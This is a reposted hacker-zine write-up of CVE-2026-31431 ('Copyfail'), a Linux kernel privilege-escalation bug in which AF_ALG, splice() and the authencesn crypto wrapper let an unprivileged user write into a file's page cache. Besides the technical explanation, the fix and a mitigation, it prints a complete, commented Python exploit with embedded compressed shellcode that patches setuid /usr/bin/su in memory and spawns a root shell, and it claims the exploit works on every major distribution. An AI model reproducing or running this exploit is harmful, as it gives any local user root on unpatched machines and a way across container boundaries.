Last update
-
732-Bytes to Pwn Linux Kernel
This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt|=-----------------------------------------------------------------------=| |=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ Beemo ]=--------------------------------=| |=-----------------------------------------------------------------------=| --[ Table of Contents 0x01 - Intro 0x02 - Dramatis Personae - subsystems 0x03 - The bug nobody saw for 9 years 0x04 - authencesn, ya cheating little bastard 0x05 - From 1000 to 0 0x06 - Proof of concept 0x07 - Howtf nobody noticed 0x08 - The fix (4 lines) 0x09 - Thoughts on copyfail 0x0a - References --[ 0x01 - Intro "Every so often, a bug comes along that makes you question whether anyone ever reads the code they're committing to." Every kernel LPE starts the same way. Here's another race condition. Here's the window. Here's the heap spray. Here's the KASLR leak. Here's the stack pivot and yadayadayda. Good luck making it work twice. Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a little help from AI - doesn't do any of that. No race. No heap spray. No KASLR bypass. No ROP chain. No compiled binary. Just a logic flaw sitting in plain sight since 2017, weaponizable in 732 bytes of Python, yielding a juicy root shell on every major distro shipped in the last nine years. You don't even need to be fast. Just a loop, four bytes at a time, from a Python script. So, how does it work ?. --[ 0x02 - Dramatis Personae - subsystems Three kernel subsystems walk into a bar. They've never met. Each one is fine alone, together they give any local user a write4 primitive into the page cache of any readable file O_o [*] AF_ALG AF_ALG (address family 38) is a socket type that exposes the kernel's crypto subsystem to userspace without caps needed. Any user can open one, bind to any registered alg template, and run encrypt/decrypt operations. It exists so userspace can offload crypto to hw accelerators without needing a kernel module per application. In practice, almost nobody uses it. OpenSSL's afalg engine is off by default but most distros compile it in anyway. >>> a = socket.socket(38, 5, 0) # AF_ALG, SOCK_SEQPACKET >>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) [*] splice() splice() moves data between fds and pipes without copying. when you splice FROM a file, the pipe doesn't get a copy of the data. It gets a reference to the page cache page. The actual physical page. >>> splice(file_fd -> pipe) # pipe now holds page cache ref >>> splice(pipe -> alg_fd) # alg socket now holds page cac When you then splice from the pipe into another fd (like our AF_ALG socket), those page cache references travel into the crypto subsystem's scatterlist. The latter now contains direct pointers to the physical pages that back every read(), mmap(), and execve() of that file on the entire system. [*] authencesn authencesn is an AEAD wrapper. It exists for IPsec Extended Sequence Numbers (RFC 4303), where 64-bit sequence numbers are split across the AAD. The wrapper has to rearrange bytes for HMAC computation. To do it, it uses the caller's output buffer as a scratch space, writing 4 bytes past the end of the legitimate output area. --[ 0x03 - The bug nobody saw for 9 years In the old code (pre-2017), src and dst were separate. Page cache pages were in src (read side). The output went to dst (user buffer). Safe. In 2017, commit 72548b093ee3 added an optimization to algif_aead.c: perform AEAD operations in-place. For decryption, the code now: - Copies AAD and ciphertext from the TX scatterlist (which may contain page cache pages from splice) into the RX buffer (the user's recvmsg buffer). - Does NOT copy the authentication tag. Instead, it chains the tag pages from the TX scatterlist onto the end of the RX scatterlist using sg_chain(). - Sets : req->src = req->dst (both point to the same combined scatterlist). req->src ----+ | v req->dst --> [ AAD || CT ] --> [ Tag (page cache pages) ] ^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^ \ RX buffer \ chained from TX SGL -+ (user mem) (file's page cache) The output scatterlist now has a writable zone (the RX buffer) followed immediately by page cache pages of whatever file was spliced in. Nothing enforces the boundary between them. Nothing documents this as a constraint. It's a silent invariant that every AEAD algorithm is expected to honor. Every AEAD algorithm indeed..Except one. --[ 0x04 - authencesn, ya cheating little bastard authencesn handles IPsec Extended Sequence Numbers. 64-bit seqno split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD. During decrypt, it needs to rearrange these bytes for the HMAC. Instead of allocating a scratch buffer it uses the caller's destination scatterlist as a notepad: crypto_authenc_esn_decrypt() -> >>> // read first 8 bytes of AAD (seqno_hi || seqno_lo) >>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0); >>> >>> // write seqno_hi at dst[4..7] (within AAD, fine) >>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); >>> >>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END) >>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); ^^^^^^^^^^^^^^^^^^^^ \ bug here! That third write goes 4 bytes past the legitimate output boundary. scatterwalk_map_and_copy() faithfully walks the scatterlist, hits the sg_chain boundary, maps the page cache page via kmap_local_page(), and writes 4 bytes of payload data directly into the kernel's cached copy of target file. The HMAC check runs, fails (the ciphertext is garbage - don't care), recvmsg() returns -EBADMSG. Nobody checks the page cache. The corrupted page is never marked dirty. The file on disk is unchanged. But every subsequent read of that file, from any process, from any container, sees the corrupted version. --[ 0x05 - From 1000 to 0 The full sequence: 1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)). Set a key. Accept a request socket. 2. Open /usr/bin/su (or any setuid binary) for reading. 3. For each 4-byte chunk of your shellcode: a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE) Where bytes[4:8] = the 4 bytes to write. Set assoclen, IV, etc. via cmsg headers. b. splice() from /usr/bin/su into a pipe, then from the pipe into the AF_ALG socket. splice(target_fd -> pipe, offset=target_page_offset, len=32) splice(pipe -> op_fd, len=32) Choose offset so that the tag region aligns with your target offset in su's .text section. c. recv(op_fd) ^^^^^^^^^^ \ -EBADMSG, but scratch write already fired Triggers the decrypt. authencesn writes your 4 bytes into the page cache. HMAC fails. recv() returns error. The page cache is corrupted. Move to next chunk. 4. execve("/usr/bin/su"). The kernel loads su from the page cache. Your shellcode is in .text. su is setuid root. Congrats, you now root :D Every process reading that file through the page cache sees the corruption. execve() loads from page cache. getpwnam() reads from page cache but the on-disk file is untouched. fsck is clean, tripwire is clean, AIDE is clean, because nothing was written to disk. No races to win. No timing windows. No kernel version checks. No arch-specific gadgets. The same script works on: Ubuntu 24.04 (6.17.0-1007-aws) Amazon Linux (6.18.8-9.213.amzn2023) RHEL 10.1 (6.12.0-124.45.1.el10_1) SUSE 16 (6.12.0-160000.9-default) ..and every other distro that ships the default kernel config with AF_ALG enabled. --[ 0x06 - Proof of concept The full exploit is 732 bytes minified, but i'll add some comments for context. You can find the original one here: https://github.com/theori-io/copy-fail-CVE-2026-31431 --8<-- cut here ---------------------------------------------------[[ BEGIN #!/usr/bin/env python3 import os as g, zlib, socket as s def d(x): return bytes.fromhex(x) # htob def c(f, t, c): # f = fd of target file (/usr/bin/su) # t = offset within file to write at # c = 4 bytes to write (shellcode chunk) # Open AF_ALG socket, bind authencesn # socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0) # https://docs.python.org/3/library/socket.html#socket.socket a = s.socket(38, 5, 0) a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) h = 279 # SOL_ALG # Set key: 8 bytes key header + 32 bytes AES-256 key v = a.setsockopt v(h, 1, d('0800010000000010' + '0'*64)) # Set AAD len = 0 (no additional assoclen opt) v(h, 5, None, 4) # Accept request fd u, _ = a.accept() o = t + 4 # offset adjustment # sendmsg() # (AAD = b"A"*4 + seqno_lo) # (SOL_ALG, ALG_SET_OP) = decrypt (0x00 * 4) # (SOL_ALG, ALG_SET_IV) = 16 null bytes # (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8 i = d('00') u.sendmsg( [b"A"*4 + c], # AAD with payload in seqno_lo [ (h, 3, i*4), # ALG_SET_OP = decrypt (h, 2, b'\x10' + i*19), # ALG_SET_IV = 16 zero bytes (h, 4, b'\x08' + i*3), # AEAD_ASSOCLEN = 8 ], 32768 # MSG_MORE ) # splice target file pages into AF_ALG socket r, w = g.pipe() n = g.splice n(f, w, o, offset_src=0) # file -> pipe (page cache refs!) n(r, u.fileno(), o) # pipe -> AF_ALG socket # trigger decrypt (authencesn writes seqno_lo into page cache) try: u.recv(8 + t) except: pass # EBADMSG expected f = g.open("/usr/bin/su", 0) # O_RDONLY i = 0 # Decompress shellcode (execve("/bin/sh") or similar) e = zlib.decompress(d( "78daab77f57163626464800126063b0610af82c101cc7760c004" "0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86" "4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999" "79fac5190c0c0c0032c310d3" )) # Write shellcode 4 bytes at a time into su's page cache while i < len(e): c(f, i, e[i:i+4]) i += 4 # Execute the corrupted setuid binary g.system("su") # Dang, you root :D --8<-- cut here -----------------------------------------------------[[ EOS Usage: $ python3 copy_fail_exp.py $ id uid=0(root) gid=1002(user) groups=1002(user) That's it. 732 bytes. Every distro. Every time. --[ 0x07 - Howtf nobody noticed Well...the bug exists because of 3 independently reasonable changes by three different developers across six years: 2011: authencesn added to support IPsec ESN (a5079d084f8b). The scratch write at dst[assoclen+cryptlen] is harmless - the only caller is the in-kernel xfrm layer, and src/dst are separate scatterlists. Nobody outside the kernel ever touches this code. 2015: AF_ALG gains AEAD support (algif_aead.c). splice() can now deliver page cache pages into the crypto scatterlist. authencesn is converted to the new AEAD API (104880a6b470). But AF_ALG uses out-of-place: req->src != req->dst. Page cache pages are in src (read-only). The scratch write goes to dst. Still not exploitable as is. 2017: In-place optimization (72548b093ee3). req->src = req->dst. Page cache tag pages are chained into the writable destination via sg_chain(). authencesn's scratch write now crosses from the RX buffer into page cache pages. The corruption is silent - no crash, no kernel log, no visible side effect except the page cache being wrong. It doesn't trigger any existing kernel self check. No KASAN or UBSAN. No lockdep. No page flags. The kernel doesn't know the page is corrupted because the write went through a legitimate code path (scatterwalk_map_and_copy) on a page that was legitimately mapped. --[ 0x08 - The fix (4 lines) Commit a664bf3d603d reverts algif_aead.c to out-of-place operation: diff --git a/before b/after index aff63c7..9ca2c95 100644 --- a/before +++ b/after @@ -1,5 +1,5 @@ aead_request_set_crypt( &areq->cra_u.aead_req, -rsgl_src, // RX SGL (same as dst) -areq->first_rsgl.sgl.sgt.sgl, // RX SGL +tsgl_src, // TX SGL (src) +areq->first_rsgl.sgl.sgt.sgl, // RX SGL (dst, separate) used, ctx->iv); The commit message: "There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings." You can temporarely mitigate if you're not able to patch it yet: $ echo "install algif_aead /bin/false" \ > /etc/modprobe.d/disable-algif-aead.conf $ rmmod algif_aead 2>/dev/null This kills the AF_ALG AEAD socket type. You'll break apps, yes, but only those who explicitly bind aead sockets via AF_ALG which in practice is almost none. --[ 0x09 - Thoughts on copyfail Copyfail might be the cleanest kernel LPE in recent history. It doesn't need race. It don't need spray. Definitely no leaks. It doesn't even need a compiled binary. A 732-byte Python script, using only stdlib modules, gets you root on every major Linux distribution shipped since 2017. The same script crosses container boundaries because the page cache is host-wide. --[ 0x0a - References [1] CVE-2026-31431 disclosure https://copy.fail/ [2] Xint Code write-up https://xint.io/blog/copy-fail-linux-distributions [3] PoC source https://github.com/theori-io/copy-fail-CVE-2026-31431 [4] Kernel fix (a664bf3d603d) https://github.com/torvalds/linux/commit/a664bf3d603d [5] In-place optimization commit (72548b093ee3) https://github.com/torvalds/linux/commit/72548b093ee3 [6] authencesn original commit (a5079d084f8b) https://github.com/torvalds/linux/commit/a5079d084f8b |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| | _ === B____ _e_ . - - ( `\( ) | __ |e__| -_|___m_ __o | | `> /~\ _* | __ -| -_|___| | . | - - (_/ /\/ |_____|___| |_|_|_|___| | * \ \ nflatrea@mailo.com `./ https://nflatrea.bearblog.dev * - Made with <3 ... . |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| --[ EOF